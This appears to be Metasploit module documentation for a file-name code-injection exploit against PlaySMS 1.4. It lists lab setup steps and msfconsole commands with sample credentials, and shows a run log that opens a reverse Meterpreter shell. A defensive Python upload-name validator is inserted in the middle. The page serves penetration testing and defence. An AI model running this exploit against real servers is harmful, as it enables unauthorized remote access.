## Description
This module exploits a code injection vulnerability in an authenticated file upload feature of PlaySMS v1.4. The issue is caused by improper file name handling in the sendfromfile.php file: authenticated users can upload a file and rename it to a malicious payload. Additional information and related vulnerabilities can be viewed on Exploit-DB [42044](https://www.exploit-db.com/exploits/42003/).
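An added example of the defensive side of the description above (not code from the Metasploit module or from PlaySMS): it parses the names a client supplies in a multipart upload, both the `filename` of a file part and a separate text field used to rename the stored file, and accepts only names that match a strict allowlist, so a renamed file can never carry shell or PHP metacharacters into the stored name. The field names `fnfile` and `newname`, the allowed extensions and the sample request body are assumptions constructed for this example.

```python
import re

# Allowlist for the stored name: a short base name plus one extension from a
# fixed set. Path separators, spaces, quotes, shell metacharacters, PHP tags
# and NUL bytes all fall outside it, so they are rejected rather than "cleaned".
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.(?:csv|txt)")
# Parameters on a Content-Disposition line, e.g. name="f"; filename="x.csv"
DISP_PARAM = re.compile(r';\s*(name|filename)="([^"]*)"')

def validate_upload_filename(raw):
    """Return the name unchanged if it passes the allowlist, otherwise None."""
    if raw is None or not SAFE_NAME.fullmatch(raw):
        return None
    return raw

def multipart_parts(body, boundary):
    """Yield (field_name, filename_or_None, part_body) for each part of the body."""
    delim = b"--" + boundary.encode("ascii")
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):  # closing delimiter "--boundary--"
            break
        head, _, data = chunk.partition(b"\r\n\r\n")
        params = dict(DISP_PARAM.findall(head.decode("latin-1")))
        # the CRLF before the next boundary belongs to the delimiter, not the data
        yield params.get("name"), params.get("filename"), data.rstrip(b"\r\n")

def check_upload(body, boundary, rename_field):
    """Validate every name the client controls: each file part's filename and the
    text field used to rename the stored file. Returns {field: (supplied, accepted)}."""
    report = {}
    for name, fname, data in multipart_parts(body, boundary):
        if fname is not None:
            report[name] = (fname, validate_upload_filename(fname))
        elif name == rename_field:
            supplied = data.decode("utf-8", "replace")
            report[name] = (supplied, validate_upload_filename(supplied))
    return report

# Constructed request body (not captured from PlaySMS); the field names "fnfile"
# and "newname" are assumptions for this demo, not the application's real ones.
BOUNDARY = "----demo"
SAMPLE_BODY = (
    b"------demo\r\n"
    b'Content-Disposition: form-data; name="fnfile"; filename="contacts.csv"\r\n'
    b"\r\nname,number\r\nalice,555\r\n"
    b"------demo\r\n"
    b'Content-Disposition: form-data; name="newname"\r\n'
    b"\r\nmonthly report.csv\r\n"
    b"------demo--\r\n"
)
```

Running `check_upload(SAMPLE_BODY, BOUNDARY, "newname")` accepts `contacts.csv` from the file part and rejects the rename value `monthly report.csv`, because the space is outside the allowlist.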
## Vulnerable Application

PlaySMS v1.4 is available at [Exploit-DB](https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz).

### Vulnerable Application Installation Setup
1. Download the application: `wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz`
2. Extract it: `tar -xvf 577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz`
3. Move it into the web directory: `mv playsms-1.4/web/* /var/www/html/`
4. Create the config file: `cp /var/www/html/config-dist.php /var/www/html/config.php`
5. Change the owner: `chown -R www-data:www-data /var/www/html/`
6. Set the DB credentials in config.php and import playsms-1.4/db/playsms.sql into your playsms database.
7. Now visit http://localhost/
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/multi/http/playsms_filename_exec`
4. Do: `set rport <port>`
5. Do: `set rhost <ip>`
6. Do: `set targeturi SecreTSMSgatwayLogin`
7. Do: `set username touhid`
8. Do: `set password diana`
9. Do: `check`
```
[*] 10.22.1.10:80 The target appears to be vulnerable.
```
10. Do: `set lport <port>`
11. Do: `set lhost <ip>`
12. Do: `exploit`
13. You should get a shell.
## Scenarios
### PlaySMS on Ubuntu Linux
```
msf exploit(multi/http/playsms_filename_exec) > run
[*] Started reverse TCP handler on 10.22.1.3:4444
[+] X-CSRF-Token for login : 13bce9776cfc270a3779e8b557330cc2
[*] Trying to Login ......
[+] Authentication successful : [ touhid:diana ]
[+] X-CSRF-Token for upload : 2780d48dc11a482a58d8a95ad873c6cc
[*] Trying to upload file with malicious Filename Field....
[*] Sending stage (37775 bytes) to 10.22.1.15
[*] Sleeping before handling stage...
[*] Meterpreter session 1 opened (10.22.1.3:4444 -> 10.22.1.15:38814) at 2018-04-08 13:45:34 +0530
meterpreter >
```